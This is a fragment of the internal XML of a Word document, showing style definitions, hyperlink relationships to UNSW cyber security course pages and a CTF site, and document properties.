    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="css-emb99l">
    <w:name w:val="css-emb99l"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00903D82"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:eastAsia="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D4E4C"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005E24F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ature-com.wwwproxy1.library.unsw.edu.au/articles/d41586-021-02634-z" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpubenchmark.net/common_cpus.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.pn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hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/cognitivevulns/?cl=1" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpubenchmark.net/laptop.html" TargetMode="Externa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attackerwork/?cl=1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xm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sidegnss.com/codes-the-prn-family-grows-again/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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enigma/?cl=1" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctfd.comp6841.xyz/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/casestudies/week-3-houdini-prep/?cl=1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.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microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/securityeverywhere/securityeverywhere3/?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D053-01F1-4C63-B5AF-1F2B15F5D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10</Pages>
  <Words>1914</Words>
  <Characters>10570</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>406</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106</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T06:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-21T20:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>